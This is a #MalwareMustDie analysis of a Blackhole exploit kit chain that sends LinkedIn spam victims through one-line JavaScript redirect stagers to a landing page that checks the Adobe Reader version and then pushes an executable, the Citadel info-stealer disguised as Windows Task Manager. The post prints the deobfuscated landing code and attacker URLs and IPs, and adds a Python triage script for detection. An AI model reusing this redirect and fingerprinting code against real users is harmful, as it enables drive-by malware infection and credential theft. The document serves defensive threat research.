===========================================
#MalwareMustDie!!!!!!!!!!
INFECTION OF CITADEL WITH BHEK
BHEK IS USING PARAMETER e & f
Exploit Method: AcroPDF.PDF
Payload download Method: Msxml2.XMLHTTP
Payload : Citadel/Trojan Password/InfoStealer
VT: https://www.virustotal.com/file/7fc40b6b0ec44852da2017dc3aa37de88ed9c2f6a2d0d41d33652990b907de22/analysis/1350446004/
=========== Only VT 6/43 !!!! ==========
DrWeb             : Trojan.PWS.Stealer.946
Norman            : W32/Krypt.GB
McAfee-GW-Edition : PWS-Zbot.gen.aln
McAfee            : PWS-Zbot.gen.aln
Fortinet          : W32/Kryptik.WDV!tr
Panda             : Suspicious file

Summary:
This trojan sends data from the infected PC over encrypted HTTP communication to 108.178.59.34 (see the network connection report below), and also downloads other malware:
* GET /Z2U.exe HTTP/1.0
  Host: 3073.a.hostable.me
* GET /PNV3Hbi.exe HTTP/1.0
  Host: 85.18.21.252

----------------------------
Set of infected files:
----------------------------
assure_numb_engineers.php  0f4f3526dd2bad681586a90fc579f6e2
index.html.2               ad967ba32c54c59db0f4a947410d96f2
js.js                      d20a786ec45f68eb56f15a589c566b27
js.js.1                    d20a786ec45f68eb56f15a589c566b27
js.js.2                    d20a786ec45f68eb56f15a589c566b27
LinkEdIn-Spam.eml          d8c4d95479f7a1264457a8d1b5e5f457
update_flash_player.exe    bb53221e4220466c876dbfad9cede066

PoC Pic: https://lh3.googleusercontent.com/-XdS_YZJvyKk/UH46i1qRPUI/AAAAAAAAGQk/H9mKzI08TLc/s541/004.jpg

===========================================
FULL ANALYSIS / #MalwareMustDie / @unixfreaxjp
===========================================
// LinkedIn spam; http://pastebin.com/raw.php?i=n7rppRJY
// Hint from @Xylit0l < Merci!!!!!!!!
// infected url detected:
...Privately (LINE 170): Chase Mathis
---------------------------------------
// download PoC
--12:24:18--  http://www.nikecup.net/MSmxYk/index.html
           => `index.html.2'
Resolving www.nikecup.net... 62.149.131.163
Connecting to www.nikecup.net|62.149.131.163|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 422 [text/html]

12:24:18 (15.01 MB/s) - `index.html.2' saved [422/422]
--------------------------------
// cat the mess
Connecting to server...
----------------------------------
// fetch the js.js, noted: referer
--user-agent="Mozilla/5.0 (X11; U; NetBSD i686)" --referer="http://www.nikecup.net/MSmxYk/index.html" --target="http://jbrnh.com/3ZKtSw8d/js.js"

--12:30:38--  http://alpuyecamorelos.com/dycYbDyw/js.js
           => `js.js'
Resolving alpuyecamorelos.com... 209.62.88.194
Connecting to alpuyecamorelos.com|209.62.88.194|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 73 [application/javascript]

12:30:38 (2.29 MB/s) - `js.js' saved [73/73]

--12:31:06--  http://videorender.com.ar/kSWEngwv/js.js
           => `js.js.1'
Resolving videorender.com.ar... 174.37.144.224
Connecting to videorender.com.ar|174.37.144.224|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 73 [application/javascript]

12:31:07 (2.49 MB/s) - `js.js.1' saved [73/73]

--12:31:26--  http://jbrnh.com/3ZKtSw8d/js.js
           => `js.js.2'
Resolving jbrnh.com... 184.168.101.248
Connecting to jbrnh.com|184.168.101.248|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 73 [application/x-javascript]

12:31:27 (2.33 MB/s) - `js.js.2' saved [73/73]

// all three have the same contents ↑
-----------------------------
// cat the mess (js.js)
document.location='http://108.178.59.34/links/assure_numb_engineers.php';
----------------------------
// fetch the mess, noted: referer, user agent
--user-agent="Mozilla/5.0 (X11; U; NetBSD i686)" --referer="http://www.nikecup.net/MSmxYk/index.html" --target="http://108.178.59.34/links/assure_numb_engineers.php"

--12:32:46--  http://108.178.59.34/links/assure_numb_engineers.php
           => `assure_numb_engineers.php'
Connecting to 108.178.59.34:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]

12:32:47 (65.45 KB/s) - `assure_numb_engineers.php' saved [27474]
----------------------------
// Voila..plugin Detect...in blurp..
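The three js.js copies above are one-line stagers that push the browser from the compromised site to the landing host, and the landing page (deobfuscated in the next section) ends with a timed redirect to update_flash_player.exe. As an added example that is not part of the original post, here is a small static triage in Python that runs over constructed copies of those two scripts and reports the indicators worth alerting on: a navigation to a different host than the document that executes the script, a navigation armed by setTimeout whose target is an executable, a PluginDetect version probe, and the onbeforeunload trap. The script copies are embedded as they appear in this post; NAV_RE, triage_script and the other names are mine.

```python
import re
from urllib.parse import urlparse

# Navigation assignments: document.location=, location.href=, window.location=
NAV_RE = re.compile(
    r"""(?:document\.location|(?:window\.)?location(?:\.href)?)\s*=\s*['"]([^'"]+)['"]""")
# Deferred call of a named function: setTimeout(name, milliseconds)
TIMER_RE = re.compile(r"setTimeout\s*\(\s*([A-Za-z_$][\w$]*)\s*,\s*(\d+)\s*\)")
# Version probe of a named plugin via PluginDetect (getVersion(".") only sets a delimiter)
PLUGIN_RE = re.compile(r"""PluginDetect\.getVersion\(\s*['"]([A-Za-z][\w ]*)['"]\s*\)""")
UNLOAD_RE = re.compile(r"window\.onbeforeunload\s*=")
EXE_EXT = (".exe", ".scr", ".msi")

# Constructed copies of the two scripts in this chain (js.js and the tail of the landing page)
JS_STAGER = "document.location='http://108.178.59.34/links/assure_numb_engineers.php';"
LANDING_TAIL = """
pdfver = PluginDetect.getVersion("AdobeReader");
end_redirect = function (){ window.location.href = 'http://108.178.59.34/adobe/update_flash_player.exe'; };
window.onbeforeunload = function (){ return ""; };
document.write('');
setTimeout(end_redirect, 60000);
"""


def _function_body(script, name):
    """Body of `name = function(...){...}` or `function name(...){...}`, or '' if absent."""
    head = re.search(r"(?:%s\s*=\s*function|function\s+%s)\s*\([^)]*\)\s*\{"
                     % ((re.escape(name),) * 2), script)
    if not head:
        return ""
    depth, i = 1, head.end()
    while i < len(script) and depth:           # walk to the matching closing brace
        depth += {"{": 1, "}": -1}.get(script[i], 0)
        i += 1
    return script[head.end():i - 1]


def triage_script(script, page_url):
    """Return (indicator, detail) pairs for a script executing in the document at page_url."""
    page_host = urlparse(page_url).netloc.lower()
    findings = []
    # Navigations armed by a timer: target URL -> delay in seconds
    deferred = {}
    for name, ms in TIMER_RE.findall(script):
        for url in NAV_RE.findall(_function_body(script, name)):
            deferred[url] = int(ms) // 1000
    for url in dict.fromkeys(NAV_RE.findall(script)):   # keep order, drop duplicates
        host = urlparse(url).netloc.lower()
        tag = "cross-host redirect" if host and host != page_host else "redirect"
        if url.lower().endswith(EXE_EXT):
            tag += " to executable"
        if url in deferred:
            tag += " after %ds" % deferred[url]
        findings.append((tag, url))
    for plugin in PLUGIN_RE.findall(script):
        findings.append(("plugin version fingerprint", plugin))
    if UNLOAD_RE.search(script):
        findings.append(("onbeforeunload trap", "leave-page prompt installed"))
    return findings


if __name__ == "__main__":
    for page, src in [("http://www.nikecup.net/MSmxYk/index.html", JS_STAGER),
                      ("http://108.178.59.34/links/assure_numb_engineers.php", LANDING_TAIL)]:
        for tag, detail in triage_script(src, page):
            print("%-36s %s" % (tag, detail))
```

On this chain the stager is reported as a cross-host redirect (the script runs in the nikecup.net document but sends the browser to 108.178.59.34) and the landing tail as a redirect to an executable fired 60 seconds after load, next to the Adobe Reader version probe; those two findings together are the pattern to key a proxy-log or sandbox JS-trace rule on.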
--------------------------------------------------------
// deobfs the code
try {
var PluginDetect = {
version: "0.7.8", name: "PluginDetect",
handler: function (c, b, a){ return function (){ c(b, a) } },
isDefined: function (b){ return typeof b != "undefined" },
isArray: function (b){ return (/array/i).test(Object.prototype.toString.call(b)) },
isFunc: function (b){ return typeof b == "function" },
isString: function (b){ return typeof b == "string" },
isNum: function (b){ return typeof b == "number" },
isStrNum: function (b){ return (typeof b == "string" && (/\d/).test(b)) },
getNumRegx: /[\d][\d\.\_,-]*/,
splitNumRegx: /[\.\_,-]/g,
getNum: function (b, c){ var d = this, a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx).exec(b) : null; return a ? a[0] : null },
compareNums: function (h, f, d){ var e = this, c, b, a, g = parseInt; if (e.isStrNum(h) && e.isStrNum(f)){ if (e.isDefined(d) && d.compareNums){ return d.compareNums(h, f) } c = h.split(e.splitNumRegx); b = f.split(e.splitNumRegx); for (a = 0; a < Math.min(c.length, b.length); a++){ if (g(c[a], 10) > g(b[a], 10)){ return 1 } if (g(c[a], 10) < g(b[a], 10)){ return -1 } } } return 0 },
formatNum: function (b, c){ var d = this, a, e; if (!d.isStrNum(b)){ return null } if (!d.isNum(c)){ c = 4 } c--; e = b.replace(/\s/g, "").split(d.splitNumRegx).concat(["0", "0", "0", "0"]); for (a = 0; a < 4; a++){ if (/^(0+)(.+)$/.test(e[a])){ e[a] = RegExp.$2 } if (a > c || !(/\d/).test(e[a])){ e[a] = "0" } } return e.slice(0, 4).join(",") },
$$hasMimeType: function (a){ return function (c){ if (!a.isIE && c){ var f, e, b, d = a.isArray(c) ? c : (a.isString(c) ? [c] : []); for (b = 0; b < d.length; b++){ if (a.isString(d[b]) && /[^\s]/.test(d[b])){ f = navigator.mimeTypes[d[b]]; e = f ? f.enabledPlugin : 0; if (e && (e.name || e.description)){ return f } } } } return null } },
findNavPlugin: function (l, e, c){ var j = this, h = new RegExp(l, "i"), d = (!j.isDefined(e) || e) ? /\d/ : 0, k = c ? new RegExp(c, "i") : 0, a = navigator.plugins, g = "", f, b, m; for (f = 0; f < a.length; f++){ m = a[f].description || g; b = a[f].name || g; if ((h.test(m) && (!d || d.test(RegExp.leftContext + RegExp.rightContext))) || (h.test(b) && (!d || d.test(RegExp.leftContext + RegExp.rightContext)))){ if (!k || !(k.test(m) || k.test(b))){ return a[f] } } } return null },
getMimeEnabledPlugin: function (k, m, c){ var e = this, f, b = new RegExp(m, "i"), h = "", g = c ? new RegExp(c, "i") : 0, a, l, d, j = e.isString(k) ? [k] : k; for (d = 0; d < j.length; d++){ if ((f = e.hasMimeType(j[d])) && (f = f.enabledPlugin)){ l = f.description || h; a = f.name || h; if (b.test(l) || b.test(a)){ if (!g || !(g.test(l) || g.test(a))){ return f } } } } return 0 },
getPluginFileVersion: function (f, b){ var h = this, e, d, g, a, c = -1; if (h.OS > 2 || !f || !f.version || !(e = h.getNum(f.version))){ return b } if (!b){ return e } e = h.formatNum(e); b = h.formatNum(b); d = b.split(h.splitNumRegx); g = e.split(h.splitNumRegx); for (a = 0; a < d.length; a++){ if (c > -1 && a > c && d[a] != "0"){ return b } if (g[a] != d[a]){ if (c == -1){ c = a } if (d[a] != "0"){ return b } } } return e },
AXO: window.ActiveXObject,
getAXO: function (a){ var f = null, d, b = this, c = {}; try { f = new b.AXO(a) } catch (d){ } return f },
convertFuncs: function (f){ var a, g, d, b = /^[\$][\$]/, c = this; for (a in f){ if (b.test(a)){ try { g = a.slice(2); if (g.length > 0 && !f[g]){ f[g] = f[a](f); delete f[a] } } catch (d){ } } } },
initObj: function (e, b, d){ var a, c; if (e){ if (e[b[0]] == 1 || d){ for (a = 0; a < b.length; a = a + 2){ e[b[a]] = b[a + 1] } } for (a in e){ c = e[a]; if (c && c[b[0]] == 1){ this.initObj(c, b) } } } },
initScript: function (){ var c = this, a = navigator, e = "/", f, i = a.userAgent || "", g = a.vendor || "", b = a.platform || "", h = a.product || ""; c.initObj(c, ["$", c]); for (f in c.Plugins){ if (c.Plugins[f]){ c.initObj(c.Plugins[f], ["$", c, "$$", c.Plugins[f]], 1) } }; c.OS = 100; if (b){ var d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod", 21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\\s*PC", 22.3, "", 100]; for (f = d.length - 2; f >= 0; f = f - 2){ if (d[f] && new RegExp(d[f], "i").test(b)){ c.OS = d[f + 1]; break } } } c.convertFuncs(c); c.head = (document.getElementsByTagName("head")[0] || document.getElementsByTagName("body")[0] || document.body || null); c.isIE = (new Function("return " + e + "*@cc_on!@*" + e + "false"))(); c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) : null; c.ActiveXEnabled = false; if (c.isIE){ var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM", "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper", "Scripting.Dictionary", "wmplayer.ocx"]; for (f = 0; f < j.length; f++){ if (c.getAXO(j[f])){ c.ActiveXEnabled = true; break } } } c.isGecko = (/Gecko/i).test(h) && (/Gecko\s*\/\s*\d/i).test(i); c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i) ? RegExp.$1 : "0.9") : null; c.isChrome = (/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i); c.verChrome = c.isChrome ? c.formatNum(RegExp.$1) : null; c.isSafari = ((/Apple/i).test(g) || (!g && !c.isChrome)) && (/Safari\s*\/\s*(\d[\d\.]*)/i).test(i); c.verSafari = c.isSafari && (/Version\s*\/\s*(\d[\d\.]*)/i).test(i) ? c.formatNum(RegExp.$1) : null; c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i); c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(i) || 1) ? parseFloat(RegExp.$1, 10) : null; c.addWinEvent("load", c.handler(c.runWLfuncs, c)) },
init: function (d){ var c = this, b, d, a = { status: -3, plugin: 0 }; if (!c.isString(d)){ return a } if (d.length == 1){ c.getVersionDelimiter = d; return a } d = d.toLowerCase().replace(/\s/g, ""); b = c.Plugins[d]; if (!b || !b.getVersion){ return a } a.plugin = b; if (!c.isDefined(b.installed)){ b.installed = null; b.version = null; b.version0 = null; b.getVersionDone = null; b.pluginName = d } c.garbage = false; if (c.isIE && !c.ActiveXEnabled && d !== "java"){ a.status = -2; return a } a.status = 1; return a },
fPush: function (b, a){ var c = this; if (c.isArray(a) && (c.isFunc(b) || (c.isArray(b) && b.length > 0 && c.isFunc(b[0])))){ a.push(b) } },
callArray: function (b){ var c = this, a; if (c.isArray(b)){ for (a = 0; a < b.length; a++){ if (b[a] === null){ return } c.call(b[a]); b[a] = null } } },
call: function (c){ var b = this, a = b.isArray(c) ? c.length : -1; if (a > 0 && b.isFunc(c[0])){ c[0](b, a > 1 ? c[1] : 0, a > 2 ? c[2] : 0, a > 3 ? c[3] : 0) } else { if (b.isFunc(c)){ c(b) } } },
getVersionDelimiter: ",",
$$getVersion: function (a){ return function (g, d, c){ var e = a.init(g), f, b, h = {}; if (e.status < 0){ return null }; f = e.plugin; if (f.getVersionDone != 1){ f.getVersion(null, d, c); if (f.getVersionDone === null){ f.getVersionDone = 1 } } a.cleanup(); b = (f.version || f.version0); b = b ? b.replace(a.splitNumRegx, a.getVersionDelimiter) : b; return b } },
cleanup: function (){ },
addWinEvent: function (d, c){ var e = this, a = window, b; if (e.isFunc(c)){ if (a.addEventListener){ a.addEventListener(d, c, false) } else { if (a.attachEvent){ a.attachEvent("on" + d, c) } else { b = a["on" + d]; a["on" + d] = e.winHandler(c, b) } } } },
winHandler: function (d, c){ return function (){ d(); if (typeof c == "function"){ c() } } },
WLfuncs0: [], WLfuncs: [],
runWLfuncs: function (a){ var b = {}; a.winLoaded = true; a.callArray(a.WLfuncs0); a.callArray(a.WLfuncs); if (a.onDoneEmptyDiv){ a.onDoneEmptyDiv() } },
winLoaded: false,
$$onWindowLoaded: function (a){ return function (b){ if (a.winLoaded){ a.call(b) } else { a.fPush(b, a.WLfuncs) } } },
div: null, divID: "plugindetect", divWidth: 50, pluginSize: 1,
emptyDiv: function (){ var d = this, b, h, c, a, f, g; if (d.div && d.div.childNodes){ for (b = d.div.childNodes.length - 1; b >= 0; b--){ c = d.div.childNodes[b]; if (c && c.childNodes){ for (h = c.childNodes.length - 1; h >= 0; h--){ g = c.childNodes[h]; try { c.removeChild(g) } catch (f){ } } } if (c){ try { d.div.removeChild(c) } catch (f){ } } } } if (!d.div){ a = document.getElementById(d.divID); if (a){ d.div = a } } if (d.div && d.div.parentNode){ try { d.div.parentNode.removeChild(d.div) } catch (f){ } d.div = null } },
DONEfuncs: [],
onDoneEmptyDiv: function (){ var c = this, a, b; if (!c.winLoaded){ return } if (c.WLfuncs && c.WLfuncs.length && c.WLfuncs[c.WLfuncs.length - 1] !== null){ return } for (a in c){ b = c[a]; if (b && b.funcs){ if (b.OTF == 3){ return } if (b.funcs.length && b.funcs[b.funcs.length - 1] !== null){ return } } } for (a = 0; a < c.DONEfuncs.length; a++){ c.callArray(c.DONEfuncs) } c.emptyDiv() },
getWidth: function (c){ if (c){ var a = c.scrollWidth || c.offsetWidth, b = this; if (b.isNum(a)){ return a } } return -1 },
getTagStatus: function (m, g, a, b){ var c = this, f, k = m.span, l = c.getWidth(k), h = a.span, j = c.getWidth(h), d = g.span, i = c.getWidth(d); if (!k || !h || !d || !c.getDOMobj(m)){ return -2 } if (j < i || l < 0 || j < 0 || i < 0 || i <= c.pluginSize || c.pluginSize < 1){ return 0 } if (l >= i){ return -1 } try { if (l == c.pluginSize && (!c.isIE || c.getDOMobj(m).readyState == 4)){ if (!m.winLoaded && c.winLoaded){ return 1 } if (m.winLoaded && c.isNum(b)){ if (!c.isNum(m.count)){ m.count = b } if (b - m.count >= 10){ return 1 } } } } catch (f){ } return 0 },
getDOMobj: function (g, a){ var f, d = this, c = g ? g.span : 0, b = c && c.firstChild ? 1 : 0; try { if (b && a){ d.div.focus() } } catch (f){ } return b ? c.firstChild : null },
setStyle: function (b, g){ var f = b.style, a, d, c = this; if (f && g){ for (a = 0; a < g.length; a = a + 2){ try { f[g[a]] = g[a + 1] } catch (d){ } } } },
insertDivInBody: function (a, i){ var h, f = this, b = "pd33993399", d = null, j = i ? window.top.document : window.document, c = "<", g = (j.getElementsByTagName("body")[0] || j.body); if (!g){ try { j.write(c + 'div id="' + b + '">o' + c + "/div>"); d = j.getElementById(b) } catch (h){ } } g = (j.getElementsByTagName("body")[0] || j.body); if (g){ if (g.firstChild && f.isDefined(g.insertBefore)){ g.insertBefore(a, g.firstChild) } else { g.appendChild(a) } if (d){ g.removeChild(d) } } else { } },
insertHTML: function (g, b, h, a, l){ var m, n = document, k = this, q, p = n.createElement("span"), o, j, f = "<"; var c = ["outlineStyle", "none", "borderStyle", "none", "padding", "0px", "margin", "0px", "visibility", "visible"]; var i = "outline-style:none;border-style:none;padding:0px;margin:0px;visibility:visible;"; if (!k.isDefined(a)){ a = "" } if (k.isString(g) && (/[^\s]/).test(g)){ g = g.toLowerCase().replace(/\s/g, ""); q = f + g + ' width="' + k.pluginSize + '" height="' + k.pluginSize + '" '; q += 'style="' + i + 'display:inline;" '; for (o = 0; o < b.length; o = o + 2){ if (/[^\s]/.test(b[o + 1])){ q += b[o] + '="' + b[o + 1] + '" ' } } q += ">"; for (o = 0; o < h.length; o = o + 2){ if (/[^\s]/.test(h[o + 1])){ q += f + 'param name="' + h[o] + '" value="' + h[o + 1] + '" />' } } q += a + f + "/" + g + ">" } else { q = a } if (!k.div){ j = n.getElementById(k.divID); if (j){ k.div = j } else { k.div = n.createElement("div"); k.div.id = k.divID } k.setStyle(k.div, c.concat(["width", k.divWidth + "px", "height", (k.pluginSize + 3) + "px", "fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "block"])); if (!j){ k.setStyle(k.div, ["position", "absolute", "right", "0px", "top", "0px"]); k.insertDivInBody(k.div) } } if (k.div && k.div.parentNode){ k.setStyle(p, c.concat(["fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "inline"])); try { p.innerHTML = q } catch (m){ }; try { k.div.appendChild(p) } catch (m){ }; return { span: p, winLoaded: k.winLoaded, tagName: g, outerHTML: q } } return { span: null, winLoaded: k.winLoaded, tagName: "", outerHTML: q } },
Plugins: {
  adobereader: {
    mimeType: "application/pdf", navPluginObj: null, progID: ["AcroPDF.PDF", "PDF.PdfCtrl"], classID: "clsid:CA8A9780-280D-11CF-A24D-444553540000", INSTALLED: {},
    pluginHasMimeType: function (d, c, f){ var b = this, e = b.$, a; for (a in d){ if (d[a] && d[a].type && d[a].type == c){ return 1 } } if (e.getMimeEnabledPlugin(c, f)){ return 1 } return 0 },
    getVersion: function (l, j){ var g = this, d = g.$, i, f, m, n, b = null, h = null, k = g.mimeType, a, c; if (d.isString(j)){ j = j.replace(/\s/g, ""); if (j){ k = j } } else { j = null } if (d.isDefined(g.INSTALLED[k])){ g.installed = g.INSTALLED[k]; return } if (!d.isIE){ a = "Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in"; if (g.getVersionDone !== 0){ g.getVersionDone = 0; b = d.getMimeEnabledPlugin(g.mimeType, a); if (!j){ n = b } if (!b && d.hasMimeType(g.mimeType)){ b = d.findNavPlugin(a, 0) } if (b){ g.navPluginObj = b; h = d.getNum(b.description) || d.getNum(b.name); h = d.getPluginFileVersion(b, h); if (!h && d.OS == 1){ if (g.pluginHasMimeType(b, "application/vnd.adobe.pdfxml", a)){ h = "9" } else { if (g.pluginHasMimeType(b, "application/vnd.adobe.x-mars", a)){ h = "8" } } } } } else { h = g.version } if (!d.isDefined(n)){ n = d.getMimeEnabledPlugin(k, a) } g.installed = n && h ? 1 : (n ? 0 : (g.navPluginObj ? -0.2 : -1)) } else { b = d.getAXO(g.progID[0]) || d.getAXO(g.progID[1]); c = /=\s*([\d\.]+)/g; try { f = (b || d.getDOMobj(d.insertHTML("object", ["classid", g.classID], ["src", ""], "", g))).GetVersions(); for (m = 0; m < 5; m++){ if (c.test(f) && (!h || RegExp.$1 > h)){ h = RegExp.$1 } } } catch (i){ } g.installed = h ? 1 : (b ? 0 : -1) } if (!g.version){ g.version = d.formatNum(h) } g.INSTALLED[k] = g.installed }
  },
  zz: 0
}
};
PluginDetect.initScript();
PluginDetect.getVersion(".");
pdfver = PluginDetect.getVersion("AdobeReader");
} catch (e){ }
if (typeof pdfver == 'string'){ pdfver = pdfver.split('.') } else { pdfver = [0, 0, 0, 0] }
function x(s){ d = []; for (i = 0; i < s.length; i++){ k = (s.charCodeAt(i) - 46).toString(16); if (k.length == 1) k = "0" + k; d.push(k); }; return d.join(""); }
end_redirect = function (){ window.location.href = 'http://108.178.59.34/adobe/update_flash_player.exe'; };
window.onbeforeunload = function (){ return ""; };
document.write('');
setTimeout(end_redirect, 60000);
------------------------------------
// infection analysis per exploit & PluginDetect hint..
===================
EXPLOIT-ED BY:
===================
// , Plugins : {
//   adobereader : {
//     mimeType : "application/pdf", navPluginObj : null, progID : ["AcroPDF.PDF",
//     "PDF.PdfCtrl"], classID : "clsid:CA8A9780-280D-11CF-A24D-444553540000", INSTALLED :
===================
DOWNLOADED VIA:
===================
// var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM",
//   "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper",
//   "Scripting.Dictionary", "wmplayer.ocx"];
// for (f = 0; f < j.length; f ++ ){
//   if (c.getAXO(j[f])){
//     c.ActiveXEnabled = true;
//     break
*********** Please be noted parameter = var f, j *****************
===================
TO URL:
===================
// end_redirect = function (){
//   window.location.href = 'http://108.178.59.34/adobe/update_flash_player.exe';}
//
--------------download PoC------------------------------------------------
--user-agent="Mozilla/5.0 (X11; U; NetBSD i686)" --referer="http://108.178.59.34/links/assure_numb_engineers.php" --target="http://108.178.59.34/adobe/update_flash_player.exe"

--12:40:16--  http://108.178.59.34/adobe/update_flash_player.exe
           => `update_flash_player.exe'
Connecting to 108.178.59.34:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 150,616 (147K) [application/octet-stream]

12:40:18 (139.15 KB/s) - `update_flash_player.exe' saved [150616/150616]   <==== CITADEL PAYLOAD

---------------INFECTION CROSS REFERENCE AUTOMATION------------------
[2012-10-17 12:42:46] [MongoDB] MongoDB instance not available
[2012-10-17 12:42:47] [HTTP] URL: http://www.nikecup.net/MSmxYk/index.html (Status: 200, Referrer: None)
[2012-10-17 12:42:47] [HTTP] URL: http://www.nikecup.net/MSmxYk/index.html (Content-type: text/html, MD5: ad967ba32c54c59db0f4a947410d96f2)
[2012-10-17 12:42:52] [HTTP] URL: http://alpuyecamorelos.com/dycYbDyw/js.js (Status: 200, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:42:52] [HTTP] URL: http://alpuyecamorelos.com/dycYbDyw/js.js (Content-type: application/javascript, MD5: d20a786ec45f68eb56f15a589c566b27)
[2012-10-17 12:42:52] [HREF Redirection (document.location)] Content-Location: http://www.nikecup.net/MSmxYk/index.html --> Location: http://108.178.59.34/links/assure_numb_engineers.php
[2012-10-17 12:42:52] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Status: 403, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:42:52] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Content-type: text/html, MD5: bc56979a0b381a791dd59713198a87fb)
[2012-10-17 12:43:04] [HTTP] URL: http://videorender.com.ar/kSWEngwv/js.js (Status: 200, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:43:04] [HTTP] URL: http://videorender.com.ar/kSWEngwv/js.js (Content-type: application/javascript, MD5: d20a786ec45f68eb56f15a589c566b27)
[2012-10-17 12:43:04] [HREF Redirection (document.location)] Content-Location: http://www.nikecup.net/MSmxYk/index.html --> Location: http://108.178.59.34/links/assure_numb_engineers.php
[2012-10-17 12:43:04] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Status: 403, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:43:04] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Content-type: text/html, MD5: bc56979a0b381a791dd59713198a87fb)
[2012-10-17 12:43:41] [HTTP] URL: http://jbrnh.com/3ZKtSw8d/js.js (Status: 200, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:43:41] [HTTP] URL: http://jbrnh.com/3ZKtSw8d/js.js (Content-type: application/x-javascript, MD5: d20a786ec45f68eb56f15a589c566b27)
[2012-10-17 12:43:41] [HREF Redirection (document.location)] Content-Location: http://www.nikecup.net/MSmxYk/index.html --> Location: http://108.178.59.34/links/assure_numb_engineers.php
[2012-10-17 12:43:42] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Status: 403, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:43:42] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Content-type: text/html, MD5: bc56979a0b381a791dd59713198a87fb)
[2012-10-17 12:43:51] [HREF Redirection (document.location)] Content-Location: http://www.nikecup.net/MSmxYk/index.html --> Location: http://108.178.59.34/links/assure_numb_engineers.php
[2012-10-17 12:43:52] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Status: 403, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:43:52] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Content-type: text/html, MD5: bc56979a0b381a791dd59713198a87fb)
-----------------------------
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00  MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00  ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00  ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68  ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F  is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20  t be run in DOS 
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00  mode....$.......
0080 50 45 00 00 4C 01 04 00 2A 26 7E 50 00 00 00 00  PE..L...*&~P....
0090 00 00 00 00 E0 00 0E 01 0B 01 02 32 00 A6 01 00  ...........2....

Bin:
//Pic:
// faking windoz app:
UninitializedDataSize....: 0
InitializedDataSize......: 23040
ImageVersion.............: 0.0
ProductName..............: Microsoft(R) Windows (R) 2000 Operating System
FileVersionNumber........: 5.0.2137.1
LanguageCode.............: English (U.S.)
FileFlagsMask............: 0x003f
FileDescription..........: Windows TaskManager
CharacterSet.............: Unicode
LinkerVersion............: 2.5
FileOS...................: Windows NT 32-bit
MIMEType.................: application/octet-stream
Subsystem................: Windows GUI
FileVersion..............: 5.00.2137.1
TimeStamp................: 2012:10:17 04:29:46+01:00
FileType.................: Win32 EXE
PEType...................: PE32
InternalName.............: taskmgr
ProductVersion...........: 5.00.2137.1
SubsystemVersion.........: 4.0
OSVersion................: 4.0
OriginalFilename.........: taskmgr.exe
LegalCopyright...........: Copyright (C) Microsoft Corp. 1991-1999
MachineType..............: Intel 386 or later, and compatibles
CompanyName..............: Microsoft Corporation
CodeSize.................: 108032
FileSubtype..............: 0
ProductVersionNumber.....: 5.0.2137.1
EntryPoint...............: 0x1ef0
ObjectFileType...........: Executable application

//Sigcheck
publisher................: Microsoft Corporation
product..................: Microsoft(R) Windows (R) 2000 Operating System
internal name............: taskmgr
copyright................: Copyright (C) Microsoft Corp. 1991-1999
original name............: taskmgr.exe
file version.............: 5.00.2137.1
description..............: Windows TaskManager

// sections: Name  VirtAddr  VirtSize  RawSize  Entropy  MD5
.text   4096    107728  108032  7.49  7bb7c23fbff31a0f4dc8c2082f47d453
.data   114688  13048   12800   1.62  bfd92f96b4b275e9bdc8941a0ac85831
